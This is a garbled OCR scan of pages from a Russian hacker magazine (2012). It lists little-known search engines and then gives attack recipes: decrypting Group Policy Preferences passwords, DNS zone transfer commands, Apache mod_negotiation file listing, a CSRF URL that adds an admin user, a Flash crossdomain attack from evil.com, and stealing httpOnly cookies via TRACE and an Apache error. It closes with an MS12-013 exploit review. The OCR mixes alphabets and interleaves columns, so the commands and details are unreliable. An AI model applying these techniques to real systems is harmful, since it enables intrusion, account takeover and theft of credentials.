ДРУГИЕ МАЛОИЗВЕСТНЫЕ ПОИСКОВИКИ

I Ыekko ll М

ix---=-qш_ .ck_

1

HA.R

M!IТeмeпyiiПiolliiЯПOMCIOIIOIICМC T eMI

1 1L _ _ _

Nigma ( нигма.рФ )

Blekko ( Ьiekko.com )

Уа Су lyacy.net )

lxquick (ixquick.com )

За пущен в конце 20 10 года. Идея

Поисковик Уа С у работает по прин­

Поисковая система компании

Ру нету тоже ес ть чем похвастать­

Blekko проста-невозможно

цип у Р2Р. Х ран е ние поискового

lxquick тоже ставит во главу угла

с я . Nigm a -

соз дать поисковик, который под­

индекса и обработка за просо в

анонимность и безопасность

лектуальная метапоисковая

ро сс ийская интел­

х одил бы всем, поэтому у каждого

осуществляются не на цен­

пользователей . l xquick, как

система, первая кластеризующая

должна быть возможность влиять

тральном сервере, а в распре­

и

поисковая система в Рунете .

на результаты поиска. Исполь­

деленной сети пиров Fгeewoгld .

формацию ни о за проса х пользо ­

зует слэштеги для сужения

Присоединиться к сети может

вателей, ни о ни х самих. Кстати,

му индексу, так и по индексам

области поиска . Например , при

любой желающий, достаточно

по утверждениям специалистов

помощи слэштега <</ пews >> можно

лишь установить ПО. Конечно ,

ком пании lxquick, их поисковы е

Google, Ya hoo, B i пg , << Яндекс >> , RamЫer, AltaVista , Aport . Проект

выполнить быстрый поиск по

здесь царит полная анонимность.

системы п е рвыми на рынк е нача­

создан при поддержке факуль­

новостным сайтам. Не так давно

Распределенная сеть пиров и от­

ли предлагать SSL-шифрование

тетов ВМиК и психологии МГУ,

крытый код гарантируют У аСу

(начиная с 2009 года) .

а также Ст з ндфордского универ­

<< Яндекс >> инвестировал в

15 000 000 долларов .

Blekko

DuckDuckGo, не сохраняет ин­

устойчивость и защищают его от

Осуществляет поиск как по свое­

ситета.

попыток цензуры .

ХАКЕР

0~3

04 / 159/ 2012

www.epidemz.net


ВЗЛОМ/ЕАSУНАСК

Ал ексе й «Gr ee nDog >> Тюрин , Digital Security [twitter.com/antyurinl

ВЫТАЩИТЬ ИЗ СИСТЕМЫ ПАРОЛЬ ОТ ЛОКАЛЬНОЙ УЧЕТКИ РЕШЕНИЕ

AO'esse ...) \ \dc2008 .1~b\SYSVOL \dc2008, j.,b\Pollcies\{3 162FЗ40-Q 160· 11 D2·9'1Sf·OOCO<!FB9S4F9} \MACHINE\Prefer·ences\Groups

Как же давно я не писал о такой прекрасной виндавай фиче,

Oossiers

как групповые политики' Тема их обхода стала особенно акту­

ij

альной после появления исследования секьюрити-группы

ESEC

[ goo.g l/ zDJFТ ].

Р

Для начала давай уточним задачу. Итак, на гипотетической

2008 Microsoft

TaiHe 1 Ко

т

е

"''

Document XML

26/

{6AC\78бC-0 1 6F· IID

LfJ

8

от локальной учетной записи, которая была создана при помощи Seгver

Nom

SVSVOI. dc200B.I<!!b PoHcies

рабочей ,станции нам нужно вы т ащить и расшифровать параль групповых политик. Если я не ошибаюсь, то начиная с

х

_:_J ....:. Groups. xml

dc2006.1ab !+ ~ NETLOGOO

СЕ

{ЗIB2F340·016D·llDJ GroupPolм:y МACHINE

-

Windows

Мlcrosoft

ввела специальное расширение для ло­

.:1

Preferences

кальных политик под названием Group Policy Preferences [GPP]. В

Windows Vista

и

Windows 7 локальные

политики поддержива ­

ются нативно, а вот для ХР потребуется поставить специальное

Файл с групповой nолити к ой для соз д ания п о л ь зователя

обновление. Так вот, одной из добавленных функций была воз­ можность создавать локальные учетные записи для группы до ­

Group Роtк:у r1anagement Editor

менных хостов. Функция, безусловно, полезная, и, как уверяют люди из

ESEC,

часто используемая администраторами. Вот такие

учетки мы и научимся доставать.

Теперь давай посмотрим, где же эти учетки создаются. Д ля

этого мы должны найти на контроллере домена раздел

<<Group Policy Management>> [gpmc.msc]. В нем создаем новую по­ литику, а затем в <<Local Users and Groups>> ве т ки <<Computer Configuration>>- нового пользователя. В процессе создания мы указываем параль и задаем другие стандартные настройки

В

PreШ~s

Action

\~lindo<o\'S~ttln9s

8 @] Control P~nel Sc:t"tn9s ';~,! O.ta Sou'cos ~DeVICeS

Gf Fo&derOptions

Тhereare

no

j8t11t - НF

~ Local Users and Groups

Loca!Group

аккаунта. После этого при обновлении политик на доменных хостах наш пользователь будет успешно создан.

Создание пользователя при помощи г р упповы х nолитик

ХАКЕР

www.epidemz.net

03 /158/2012


EASY НА СК

Дальш е ребята и з

ESEC

п осмотрели, как все nроисходит изну­

subAuthority= " " userName="MylocalUser" /> </ User> </Groups >

три, и как данные о груnnовых политиках передаются с контрол­

лера на хосты. Итог оказался вполне предсказуемым. При обновлении политик дом енный хает залезал на шару

SYSVO L-д o м e н a и скачивал ХМL-файл с политикой. В нем как раз Здесь необходимо уточ нит ь еще несколько моментов. Во­

и н аходил и сь имя пользователя и па роль. В общем, все стандар­

первых, данный файл доступен всем доменным пользователям,

тно . Прим ер тако г о файла:

даже непривилегированным. В о -вт орых, параль расшифровать

очень просто, ведь хотя и и спользуется

c?xml version= "1.8" encoding= "utf-8" ?> cGroup s clsid= "{3125E937-EB16-4b4c-9934-544FC6D24D26} " >

AES 256,

но вот ключ

nрошит в са м ой ОС , то есть известен априори. На нашем диске ты сможешь найти питонавекий скрипт для расшифровки таких

па ролей.

<User clsid= "{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name= "MyLocalUser" image="8" changed= "2811-12 - 26 18:21 : 37"

За остальны ми подробностями советую обратиться к ориги­

нально м у исследованию

ESEC.

Хотя оно и не является исследова­

нием в своем пер ваначальнам смысле !это скорее доведение до хакере к их масс официаль н о описанной фичи), Microsoft в описании

uid= " {A5EЗF388-299C-41D2-B937-DD5Eб38696FF}" >

GP <Properti es action= "C" fullName =" " description= ""

четко nредупреждает, что данные в

GPP

передаются в незащи­

щенном в ид е.

И что использовать функционал требуется с большой осто­

cpassword = "j1Uyj3VxBTY9LtLZil2uAuZkFQA / 4latт76ZwgdHdhw"

рожностью, особенно при создании привилегированных учеток

changelogon= "8" noChange= "8" neverExpires ="8" acctDisaЫed= "8"

в ОС.

ПОЛУЧИТЬ СПИСОК ХОСТОВ ИЛИ

DNS ZONE TRANSFER

Р ЕШЕНИЕ При провед ении любогоИБ-исследования в первую очередь нам требуе т ся ответи ть на во пр ос «а кого же атаковать>>? Это важно, так как практически любая атака чаще всего проводится nротив какой-т о ор г ан и зации, у которой может быт ь очень много ресурсов. А нам необходимо определить с реди них самое с лабо е зве н о или наиболее критичный ресурс. DN S-имя хос та может д а т ь прилич­ ный профит в этом с м ысле, так как зачастую оно отражает свой функциона л ьный с мы сл. Н ап рим ер, в корпоративных сетях вполне могут при сутство вать такие имена как

«b uhg al>>

или

«bank>>,

до ко­

тор ых тебе, конечно же, захо чет ся д обраться. Как при мер, для веба

можно в зять поиск <<с крытых>> доменов вроде

admin.example.com .

Одним из простейших методов опре д еления имен хостов

является об р ат ный DNS- зan p oc lгeveгsel, когда мы запрашиваем у DNS- cepвe pa именахостов на основании их IР -а дре сов. Однако для карпаративак этот метод ш умноват, так как необходимо за п ра­ шивать имена для всех хос тов по очере ди , а для веба он не совсем оправдан, -д омены могут нах о дить с я не на смежных IР-адресах. Н о если нам п овезет, и DN S - cepвep не совсем корректно настро­

ен, т о мы сможем получить всю необходимую информацию разом. Д а-да, я говорю про

DN S Zone

докумен т ированная функция

Tг ansfeг. Для т ех, кто не в курсе, эта

DNS

nр е дна значена для того, ч т обы

д е л иться св оими заnисями о зон е. П ри корректной настройк е

Zone transfer для

одного из корневых серверов домена . агра

Zone

Тг апsfег должен быть разрешен с первичного DN S - cepвepa т олько

дить

на вторичный , но об этом часто забывают.

все свои заnис и. Жаль, конечно, что в этом сп и ске отсутствуют

zon e tгa nsfeг.

Е сли точ н ее, то

65

из

312 TLD

n озволяют получить

порту DNS -cepвepa по nротоколу ТСР и создать AXFR-зanpoc.

.com 250 заарх и ­ вированных мегабайт можно получить по ссылке goo.gl /uVS1X . Но

Практиче ски это можно вы п олнить, используя только функционал

давай п опробуем собрать такой списо к сами:

ст андартной виндавай команды

1. 2. 3.

Используем стандартную команду

4.

Д елаем за прос на доменаграи получаем обслуживающие е го

Итак , чтобы получить зо н у, нам требуется подключи ть ся к

буд ет исnользование

nslookup,

53

но nрактичней вс его

Nmap.

nmap --s cript dn s-zo ne-tran sfer. nse \ - -scr ipt-args dn s-zone-t ra nsf er.domain= <domain >

и . гu, н о все равно nриятно. П олуче нны й им сnисок на

nslookup.

Выбира ем DNS- cep вep от Гугл а: sегvе г 8.8.8.8. Выставляем тип искомых записей :

Set type=NS.

DNS-c epвep ы: агра.

5. Н о все это классика. П риведу в пример небольшее исследова­

ни е, проведенн ое неб ез ы звест ным экспертом НО Мооге . Он nро ­

ска нир овал ос н овные D N S-cepвepы о т их TLD ltop-level-domain: .net, .огg , .ххх и так далее) и вывел, что многие из них разрешают право-

Подключаемсяк одному из DNS-cepвepoв в списке: sегvег b.гoot­ se г veгs.net.

6. Трансф е рим зону для у казанного домена: ls -d агра. Конечно, агра-это так, для забавы, много интересной инфор­ мации мы не получим. Н о общая идея, думаю, nонятна.

ХАКЕР ОЗ /158/2012

www.epidemz.net


ВЗЛОМ 1EASY НАСК

ПРОСМОТРЕТЬ ЛИСТИНГ ФАЙЛОВ В АРАСНЕ

d•Ы!r.:J -лк:r

РЕШЕНИЕ Для начала давай представим себе ситуацию, что мы исследуем

foo.htm.eп и

какой-то ёайт. На этом сайте крутится

который совпадает с пришедшим от клиента заголовком

Apache.

Первым делом же­

лательно понять, какой же движок используется нашим ресурсом. Если точно определить

CMS,

то, используя общеизвестные

foo.htm.de, то по за просу /foo.htm будет отдан тот, <<Accept-

Language>>. Но еще более интересным является поведение модуля с ис­

уяз вимости, произвести взлом будет очень просто. Но если это

пользованием параметра

что-тонестандартное и без доступных исходников, то могут воз­

тестовом запросе

никнуть проблемы. Хотя многое зависит от самого приложения.

тории по маске

В любом случае я не думаю , что нужно сразу же погружаться

вариант>>.

в дебри взлома, стоит еще немного пособирать информацию. Что

Mu ltiViews. Е сли он включен, то при <<foo>> Apache проводит поиск в данной дирек­ <<foo*>>, а потом отдает пользователю <<наилучший

Включение

Mu ltiViews производится за счет записи строки MutiV iews в секции виртуальных хостов или конкретных

мь1 ищем? Любые полезные нам данные. Например, исходник и,

Optioпs

файлы бэкапов, конфиги . Как искать?

директорий. Хорошо, но что же все это нам дает? Тебе ответит И Б­

Первым делом желательно и обязательно проверить возмож­

исследователь Стефа но Ди Паола (Stefaпo Di Paola, goo.gl/ly8HK ]:

ность листинга директорий на сервере, и, если она присутствует,

частичный листинг файлов. Как? Все очень просто. В

мь1 сразу поймем, что можем получить. Например , на одном из

Стефан о помучал данный функционал и выявил, что при уста­

2007

году

сайтов, с которыми я когда - то имел дело, как раз и присутствовал

новке некорректного заголовка

такой листинг, а в самом приложении, как оказалось, находилось

последний с помощью логики mod_пegatiatioп вернет нам список

всего пара рhр-скриптов, которые просто п о дгр ужали осталь -

абсолютно всех файлов с запрашиваемым именем, так как не

ной функционал из iпс-файлов. Так как файлы типа iпс

сможет выбрать <<лучший вариант>>. Смотри, если мь1 запраши­

Apache

не считает какими-то уж особенными и позволяет их абсол ютно

ваем файл

спокойно скачиват ь , то я очень быстро и легко по лучил почти

вернется << наилучшиЙ >> вариант:

foo

<< Accept >>

при запросе к серверу

без расширения, но с заголовком

<<Accept>>,

то нам

все исходник и сайта. Но так везет не всегда . А что делать, если листинга нет? Классика пент еста - это брутфорс по слова рю. Не­

Запрос

когда я писал об этом и упоминал ту л зу DiгBusteг. Но брут форс­

GET /foo Н ТТ Р/ 1.1 Accept: */*

штука грубая , хотя и вполне рабочая . Но давай ближе к теме . Всем известный веб-сервер

Apache

со держит интересный модуль под названием mod_пegatiatioп.

Ответ

Данное ра с ширение чаще всего включено по дефолту. Если

Н ТТ Р/ 1 . 1 21313 ОК Server: Apache/2 . 13 . 55 Content- Location : foo.php Vary: negotiate,accept TCN: choice

говорить по-простому, т о отвечает оно за <<у мную отдачу контен­

та». То есть, если пользователь запрашивает какой-то ресурс

!страницу], то ему будет отдаваться страница, которая подходит больше всего . Н апример, если на сервере хранится пара файлов

Частичный листинг файлов . Бэкаn найден- качаем

ХАКЕР

046

www.epidemz.net

04/159/2012


EASY НАСК

А если мы запрашиваем то же самое, но снекорректным за­

когда файлы бэкапов хранятся рядом, случаются очень часто,­

головком <<Ассер!», то нам вернет ся практически полноценный

многие программы автоматом создают их при редактировании

листинг:

основных файлов. Важным ограничением способа является то , что в вывод веб-сервера попадают только те файлы, чье рас­

За прос

ширение присутствует в конфиге апача [AddType] . То ест ь файл

GE T /foo НТ ТР/ 1 . 1 Acce pt: ххх/ЫаЫа

с расширением .php- в листинг, к сожалению, не попадет. Думаю, з десь важно подчеркнуть, что описанное выше по­ ведение Apache- нормально. То есть разработчики не собираются

От ве т

менять его. И как уже было сказано выше, это свойственно всем

НТТР/1. 1

основ ным веткам Apache. Хотя данная фича в любом случае не

406 Not AcceptaЬle Server: Apache/2.0 . 55 Alternat es : { "foo .bak" 1 { t ype appl i cation/x-trash} { l ength 3}}, {"foo.php" 1 {type appl ication/x-httpd - php} {length 3}}

избавляет нас от необходимости перебора, но мы вполне можем

воспользоваться уже имеющимися данными [именами страниц] и не перебирать вслепую.

В Metasploit присутствует соответствующий модуль [auxiliaгy/ scaппeг/http/mod_пegotiatioп_bгute], проводящий брутфорс с уче­ том этой фичи, да и сканер от Acuпetix имеет аналогичный функ­

Vary: negoti ate,accept TCN: l ist

ционал. В качестве простейшего примера- чекер mod_negotiation с использованием пmар:

Что это может дать? Конечно, все сильно зависит от ситуации, но в основном это попытка добраться до бэкапов. Кстати , ситуа ции,

пmар

--script=http-apache-negotiation

-р80

-sV

ВЫПОЛНИТЬ ДЕЙСТВИЯ.,ОТ ИМЕНИ ПОЛЬЗОВАТЕЛЯ В КАКОИ-ЛИБО

РЕШЕНИЕ

CMS дефопту на всех компьютерах [привет яблочникам

Для начала давай расширим задачу. Есть пользователь, залоги­

:1. А

во-вторых,

предоставляет много возможностей по взаимодействию с сетью.

нившийся в какую-нибудь веб-систему [например в админку]. Есть

В самом простом виде атака с использованием flash будет иметь

хакеры, которые хотят получить привилегированный доступ в эту

следующий вид. Есть evil .com- хает атакующего со специальной

сис тему. Дл я приличия добавим возможность подсунуть этому

флэш кой, и есть victim.com с нужными нам данными. Когда юзер

пользователю произвольную ссылку или проснифать его незашиф­

зайдет к нам на evil.com, флэш автоматически запустится и вы­

рованный трафик [хотя сама админка будет находиться за https'oмl.

полнит загрузку страницы с victim.com, причем используя родные

Самый простой и действенный способ- это, наверное,

CSRF:

кукисы пользователя! Д алее все стандартно,- из страницы доста­ ем токе н , подставляем его в запрос и выполняем.

Все круто? Как бы ни так. Здесь нам мешают same oгigiп po licies . Ведь evil.com- один домен, victim.com- другой, а следова­

https://victim.com/admin . php?adduser= 1&user=hacker& password=hacker

тельно взаимодействие по флэшу запрещено. Однако существует Если мы заставим браузер перейти по этой ссылке, то в системе

и вполне легальный способ, разрешающий такое <<общение>>,- это

будет создан новый пользователь. Но это возможно только в том

файл

случае, если веб-приложение уязвимо к таким атакам . К счастью,

шу. Он должен быть расположен в самом корне сервера victim.com.

crossdomain.xml. В нем указывае тся, что можно делать флэ­

во все большее количество ПО внедряются всяческие механизмы

Таким образом, когда флэш-ролик пытается прочитать страничку

защиты от CSRF. Самый распространенный- токены. К каждому за­

с victim.com, флэш сначала читает victim.com/cгoss domaiп.xml и на

просу на странице добавляется токен, который действителен толь­

основе него уже делает вывод, разрешено ли подключаться к этой

ко для одного запроса. Таким образом мы получаем ссылку вида

странице. В настоящий момент флэш поддерживает целый набор о граничений. Я не буду описывать все, коснусь лишь основных,

общая спецификация от adobe находится по адресу goo.gi/A02R1.

https : //v i ct i m.com/a dmin . php ?a dd user=1&u ser= hacker& password= hacker&toke n=l on g_ran dom_bu kva _ ci fra

Вот при мер :

Да, CSR F уже не про катит. Что дальше? Конечно же, XSS. С по­ мощью этого вида атак мы сможем загрузить нужную страницу,

вынуть токе н и создать ядовитый запрос [плюс много еще всякого ст рашного ] . Н о у XSS есть пара проблемных моментов. Хотя они и являются самым распространенным видом багов на сегодняшний

день, но в основном это касается гeflected XSS [то есть когда код

попадает из запроса], ведь stoгed XSS [когда мы можем добавить контент в страницу] бывает не часто. Но во многие браузеры натив­ но и л и с помощью плагинов встроена хорошая защита от гeflected

c?xm l version= "1.0" ?> c!DOC TYPE cross-domain-pol i cy SYSTEM "http://www.adobe . com/xml / dtds/cross-domain-policy.dtd" > ccross-domain-policy> csite-control permitted-cross-domain-policies= "master-only" /> callow-access-from domain= "* .victim.com" sec ure= "false" /> callow-access- f rom domain= "www.microsoft.com" /> c/cross-domain-pol i cy>

XSS. Классический пример -IE. И здесь без извращений и/или Поясню некоторые моменты. Главный пункт здесь, конечно

со циальной инженерии защиту не обойти. Давай посмотрим, можем ли мы сделать что-то еще? Ответ­

flash. У него есть несколько плюсов. Во-первых, сейчас он стоит по

Х АКЕР

же, это allow-access-fгom, указываю щий на то, с каких серверов

доступ разрешен. Здесь э то любые поддомены victim.com и один-

04/159/ 2012

047

www.epidemz.net


ВЗЛОМ 1EASY НАСК

Microsoft. Master-only указывает на то, что исnользуется только crossdomain.xml, лежащий в корне, хотя есть и другие варианты,

«si te-control>> находится не в положении «master-only»l, а до­

но об этом дальше. Вот теперь у нас появляется возможность

ступ флэш - ролику будет разрешен только в данную директорию

для маневров. Наnример, с помощью

DNS

или

можем представиться одним иэ поддоменов

NBNS-spoofing victim.com и по­

мы

лучить, таким образом, возможность использовать флэш на

быть разрешение от корневого файла [значение директивы

или ее поддиректории. Таким образом, у нас есть небольшая возможность либо найти альтернативные файлы на

полную. Кроме того, мы можем искать уязвимости уже во всех

этих доменах и через них атаковать пользователей

victim.com. Далее нам интересен атрибут secure [по-дефолту «true>>l,

victim.com,

либо залить xml'кy. Кстати, наиболее простым и частым баrом здесь является неправильное использование директивы

<allow-access-from

«>. В данном случае мы можем обращаться к жертве

domain=>>*

указывающий на то, нужно ли флэш у обращаться к данному хо­

с любого из хостов, а также производить nочти любые действия

сту только с https. То есть в данном случае [falsel мы можем про­

от чужого имени. Много ли таких сайтов? Прилично. П одроб­

вести на

ности смотри в научной работе про анализ

victim.com

атаку

Man-in-the-middle,

а затем внедрить

нашу флэш к у в НТТР-ответ от сервера. П олучается, флзшке

Alexa

Тор

50 000

от

наших коллег из Сан-Диего [goo.gl/riCLll . Еще хотелось бы вспомнить про такую альтернативу флзшу

буде т разрешено «обща ться >> и с https'oм этого домена. Также хочу добавить еще несколько важных замечаний.

как

Silverlight

от

Mi croso ft.

У них nочти аналогичная система

Во-первых, когда флэш-ролик отправляет куда-либо запрос,

кроссдоменного взаимодействия, только с несколькими отли­

то в качестве его родного домена определяется то место, где

чиями. Файл политик называется

флзшу можно указать альтернативный файл политик, назы ­

clientaccesspolicy.xml, однако Silverlight его не находит, то ищется crossdomain.xml. Сам же clientaccesspolicy.xml не поддерживает исnользование символа множества 1«*>>1 для оnисания доменов и не различает http- и https-npoтoкoлы. Так что через него также можно вы­

вающийся по-другому и лежащий на

полнять действия от имени пользователя, если только повезет

он хостится фактически, а не то, где он вставлен в страницу. Во-вторых, при отсутствии

crossdomain.xml

флэшунасамом

деле не « запрещается все», как считают многие. В таком случае

файлы

crossdomain.xm l

victim.com.

В-тр етьих,

могут лежать и в паnках . Но должно

если

с хml'ками.

ОБОЙТИ ФЛАГ COOKIES HTTPONLY РЕШЕНИЕ XSS- это одна из самых распространенных ныне уязвимастей

SESSION1D::tmAhnpOnJyCoolde

веб-приложений. К тому же она очень опасна, потому что по сути мы можем выполнять почти любые действия от имени пользова­ теля. Но если все же вернуться к классике, то итогом

XSS

ок

долж-

на быть украденная сессия пользователя. Так как чаще всего авторизация юз ера происходит именно по кукисам, то целью атаки

с использованием

XSS

является их угон. Чаще всего это можно

сделать с помощью данных из переменной

Но все

document.cookie.

несколько затруднилось, когда появился такой чудо-браузер, как Разработчики внедрили в него специальный флаг

IE6.

httpDnly.

НТТР/!.!

javascript.

Ага, идея хорошая.

Вот только с реализацией не так все здорово, ведь по идее флаг

t eb : 01:

::о: ~9:

JS GKT

Арасье·::. : .н

1FreeBSD1 nood ss 1 ·:.::.11 OpenSSL/0.9.7e-p l Con't:'!lnt-Lenqt h : н:е

Connect1on: clo:~e Content-Type: text,'htnal: Т"

Основная его задача заключается в том, чтобы указать браузеру, что данную куку нельзя доставать из

P..equ~st

100 8fld

Dllt!': T!IU, 09 S~rver:

.!.

TXL

'IBL:

Р И Р/.5.::.1:

·ot t.h

Suhcннn- Plltch nюd

t cq1d':.з.s

-

cho~~rset•iso-8859-1

"·

Reqцest </hJ>

<h!>Blld

<P> Yo11r brovser se11t 11. re\(\\e s t. tiiAt. t.his se rv er co1tl.d 11ot tшderstмld S i %e ot "' reqt 1est lteAder f t e..l.d exceeds server ~inoit .<t' '>

.<bt

1>

должны выставлять сами разработчики ПО , которые до сих пор

этим nренебрегают. Теnерь давай nредnоложим, что его обойти? Бородатый метод-

<<httpOnly>> установлен. Как cross-site tracing. Придуман он

аж в с

2003 году и основан на том, что многие веб-серверы наряду GET- и РОSТ-методами поддерживают еще и ТRАСЕ-метод. Дан­

ный метод крайне пр ост: веб-сервер возвращает полностью весь запрос, который был отправлен клиентом. То есть получается так: мы должны внедрить через

XSS

такой код, который должен будет

отправить любой запрос на тот же сервер с методом

TRACE,

а затем

прочитать пришедший ответ. В этом ответе кроме искомых кукисов

могут содержаться и другие интересные данные

[basic или ntlm-

Apache 2.2. Большой D:ч•rj

· .. .:- "!

TRACE /

>nc,~t НТТР/1.1

заголовок лриводит к ошибке с раскрытием кукисов

l ..

u 80

~: ~~ ~ ~ : Sc;; 1orr 1 D~u4enZ<o:; 4 i4crш" y,oCook,o 1

НТТР/ 1.1

Doil.te:

200 ОМ f1111. f·J9 Feh 2012 7.U:!.o9:42 GMI

s.,....,.,,.: Ap.•clte/2.2.14 L/('1 . 9.?.-·pt y,. ,..,~fer-l:llcodin!l:

Contcnt-Typc:

'"

<F•·eoВSD>

РНР/!..2.12

11itl1

SLoloo:;i~t-P.otclo oшtl_ic!lid/2.3.!>

l'lotl_~~l/2.2.14

Оре

~;)щrLI<ed

nc~~.~ge/lottp

IRACF / IIITP/t .1 Ho~t:

1

. .

_ _ .<

Cook ie : Se ~ ~ ion 1 D ·o 4enz..,~ 4 i4enn,,y.oCook,,

аутентификацияl. Важно упомянуть, что многие веб-серверы до сих пор поддерживают данный метод.

Кроме всего этого существуют также и несколько зависимых

ТRАСЕ- з алрос . Веб -с ервер во з вращает все , что ему послали. Дажекуки

от сервера возможностей. Новым и крайне забавным примерам является

клиентом запрос. Чтобы создать такой запрос, требуется всего

сии

Apache. Если точнее, то вся его ветка 2.2 вплоть до вер­ 2.2.22. Логика здесь такая же, как и в случае с TRACE, только

лишь отправить легитимный пакет с очень большим заголовком.

кукивозвращаются в ответе об ошибке веб-сервера. Норман

В РоС' е автора используется простейшая реализация этого ба га:

Хипперт [Norman Hippert, goo.gl/ndGpvl обнаружил, что при ошибке

с помощью

400 [НТТР 400 Bad Requestl возвращается весь отправленный

кукисов и отправляет запрос на сервер.

javascript

он выставляет большое количество длинных

ХАКЕР

048

www.epidemz.net

04/159/2012


(game}land ЖЕI\ЕЗОi 10 дюймов и ЗG за 400 баксов

~~

ПОДПИШИСЬ! shop.glc.ru Редакционная подписка без посредников это

гарантия

получения

важного

для

-

Вас

журнала и экономия до 40 о/о от розничной цены в киоске

6 номеров - 111 О руб. 13 номеров - 1999 руб.

6 н омеро в - 111 О руб. 13 н оме ров - 1999 руб.

8-800-200-3-999 +7 (495) 663-82-77 (бесплатно)

ФОТО

6 13

н оме ров номеров

- 564 руб. - 1105 руб.

6 н омеро в - 111 О руб. 13 но меро в - 1999 руб.

6 13

н омеровномеров

-

810 руб. 1499 руб.

6 номеров - 111 О руб. 13 номеров - 1999 руб.

XYIIИГIJH

6 13

номеров номеров

-

630 руб. 1140 руб.

6 13

н омеров ном еров

-

895 руб . 1699 руб .

6 н о меров - 1194 руб . 13 н о меров- 2149 руб .

6 13

номеров

6 13

номеров-

н омеро в

-

894 руб. 1699 руб.

lффi!. !JU.ЦЩ:IЦ!iЦЩШ -··.

шr;~а.ш.rr,м ~ КРАСНАЯ

YrP03A ASTotLUA

ТАИНОЕ ОРУЖИЕ

6 13

н омеров номеров

- 690 руб . - 1249 руб .

6 13

номеров номеров

-

775 руб . 1399 руб.

6 13

номеров номеров

-

www.epidemz.net

950 руб . 1699 руб.

номеров

-

810 руб . 1499 руб.


Павел Александрович [ivinside.Ыogspot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Дмитри й Михайлович

[115612, дер. Красная звездочка, д . 1[

эксплоитов И вновь мы с тобой встречаем с я , чтобы разобраться во внутрен не м устройс тв е последних

интереснейших образцов из области эксплоитостроения. Крепче хватайся за жу рнал и внемли же слогу бинарному ...

ХАКЕР

DSD

www.epidemz.net

04/159/2012


Обзор экс п ло ит ов

MS12-013: Уязвимость в библиотеке времени

1

выполнения С (msvcгt.dll)

. text:6F FBEA20 pus h еЬх ; mov е Ьх , [esi] i n the entry .text:6FFBEA21 call - calloc_crt

кой msvcгt.dll размера буфера в памяти существует уязвимость,

. text : 6FFBEA26 . text: 6FFBEA27 .text:6FFBEA28 .text:6FFBEA2A .text:6FFBEA2C . text:6FFBEA2E .text:6FFBEA31 . text:6FFBEA34 .text:6FFBEA37

которая делает возможным удаленное выполнение кода и по­

. text:бFFBEAЗD

зволяет копировать данные в память, не выделенную должным

.text:бFFBEAЗF

CVSSV2

9.3

11111 11 1111 11 11 111 IAV:N/AC:M/AU:N/C:C/1:(/A:C]

[]Il]i Msvcгt.dll- многопоточная библиотека динамической ком­

поновки IDLL] времени выполнения С, которая используется компонентами системного уровня. В способе расчета библиоте ­

рор

есх

рор

есх

Ыосk

mov [edi], еах test еах, еах jz short loc_6FFBEA1A push [ebp+pulResult] ; size_t mov еах, [ebp+arg_8] push [ebp+arg_4] ; void * mov dword ptr [еах], 1 push dword ptr [edi] ; void * call _memcpy

образом. Эта уязвимость делает возможным удаленное выпол­ нение кода при запуске пользователем специально созданных

файлов мультимедиа. Е с ли пользователь вошел в систему с права ми администратора, то злоумышленник, которому уда­

лось воспользоваться уязвимостью, может установить полный контроль над системой, после чего он сможет устанавливать программы, просматривать, изменять и уничтожать данные или

создавать новые учетные записиснеограниченными права ми.

Риск для пользователей, учетные записи которых имеют огра­

.text:6FFBEA44 mov еах, [esi] .text:6FFBEA46 push esi ; pulResult .text:6FFBEA47 add еах, еах ; ! ! ! ! .text:6FFBEA49 push 2 ; int . text:6FFBEA4B push еах ; int . text:6FFBEA4C mov [e si], еах . text : 6FFBEA4E call ?SizeTMult@@YAJ I I PAI@Z ; SizeTMult(uint, uint,uint *)

ниченные права, меньше, чем для пользователей, работающих с .text:бFFBEASЗ add esp, 18h .text:6FFBEA56 test еах, еах .text:6FFBEAS8 jge short loc_6FFBEA78

правами администратора.

l j:JЦ!•'ii Патч от MS затрагивает функцию __ check_float _ stгiпgl]. В связи с тем, что библиотека времени выполнения С поставляется в виде исходниковсовместно с MS Visual Studio, посмотреть на

вышеупомянутую функцию можно в VC/CRT/sг c/iпput.c . Логика работы у функции __ check_float_stгiпgll следующая. С самого начала у библиотеки времени выполнения имеется

Обрати внимание на аргументы функций __ calloc_cгtll и SizeTMultll . В момент вызова _ _ ca l loc_cгtll мы имеем сле дующий набор аргументо в: __ calloc _ cгtiSize, 2]. Однако в момент, когда для записи переменной размера вызывается функция SizeTMult, ее набор аргументов выглядит так:

буфе р статического размера I_TCHAR floatstring[_CVTBUFSIZE

+ 1] ; 1. Как только требуется буфер большего размера, проис­

SizeTMult(Size*2, 2, &pResult)

хо дит перераспределение памяти. Порядок подобного пере­ распре деления таков: выделяется удвоенный размер буфера и

П осему, несмотря на реальный размер выделенной памяти

удваивается значение переменной, содержащей этот размер.

под буфер в Size*2, в переменную размера сохра няется значение

При первой итерации увеличения используется вызов функции

Size * 2*2. В связи с этим переполнение кучи происходить будет,

callocl], далее используется гecallo ci]. Основной момент, в связи с которым имеет место быть MS12-013 , состоит в nопытке записи

но- за пределами рассматриваемой функции.

нового размера буфера.

SizeTMultll. В этот раз имеем SizeTMult(Size, 2, &pRes ult ]. В итоге MS пришлось избавиться от инструкции «add еах, еах»:

Ниже приведен дизасм-листинг старой версии msvcгt.dll:

.text:б F FB EAlE loc_6F FBEA1E : ; CODE XREF: sub_6FFBE9F3+25 ] j . text:6 FFBEA1E push 2

155 ••• 156 • lnt 157 -

158 ·

· · ·

_те~~ - ·

.Т >АР·

lnt•>

Ci'Wck .f tl'ltrt ts tnou"'" SP4tl ii'IИrt ont~~~ort ~harocttr tr tht gl\len

159 •

166 161 1&2 163 16<1

l

~-~heck.f!cat .s t~t,...cslzt.t.sl:t.t

Puroost

Ыос:•

J:ttuгn

-

FAlS(

Jfncttlwt'laiiiiCDtt-.ort~\,1

:f .,orf•t~~~or ynvtdedo"dthertoollocottonfolltd.

·

1&'5 ···············································································1

166 167 .. totlc lnt. •• cl\tck. fl ot~t.s tr ! no C •.Itt' . t N lo &t StrUs.ct , 16!1 ~''' t • pnf'\ oetStr Sz . !69 . TCt!RR •• Df'l o11tStr ,

~~~

i~~goa;П ~~~F}~~~~t,.rtaoJ

172 ( 173 17< 17'. 176 171

vold

•tlrч!Po l n t и ;

CPТJ.JRRНIHB_D I SRВL E_PUSH C ''fl\1 ,

